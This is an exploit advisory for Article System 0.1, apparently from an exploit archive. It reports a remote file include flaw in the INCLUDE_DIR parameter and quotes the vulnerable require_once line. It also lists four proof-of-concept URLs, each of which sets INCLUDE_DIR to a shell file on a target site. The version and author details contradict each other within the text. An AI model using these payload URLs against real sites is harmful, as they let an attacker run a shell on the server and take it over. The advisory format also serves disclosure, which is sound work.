id: 1382
date: 01/11/2007
title: Article System 0.1 (INCLUDE_DIR) Remote File Include Vulnerabilities
author: 3l3ctric-Cracker
cves: 

====================================================================
Article System 0.1 (INCLUDE_DIR) Remote File Include Vulnerabilities
====================================================================



########################################################################################################################
#Script:Article System                                                       #
#Affected Version:1.0                                                        #
########################################################################################################################
#Author:Dr Max Virus                                                         #
########################################################################################################################
#Bug in:/[path]/include                                                      #
#Vul Code;                                                                   #
#require_once ("$INCLUDE_DIR/classes/class.form_item.php");                  #
########################################################################################################################
#POC:                                                                        #
#http://[target]/[script_path]/include/forms.php?INCLUDE_DIR=shell.txt?      #
#http://[target]/[script_path]/include/issue_edit.php?INCLUDE_DIR=shell.txt? #
#http://[target]/[script_path]/include/client.php?INCLUDE_DIR=shell.txt?     #
#http://[target]/[script_path]/include/classes.php?INCLUDE_DIR=shell.txt?    #
########################################################################################################################
#Thx:koray-Timq-r0ut3r-nuffsaid-All My Friends                               #
#Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk                          #
########################################################################################################################



#  0day.today [2023-03-24]  #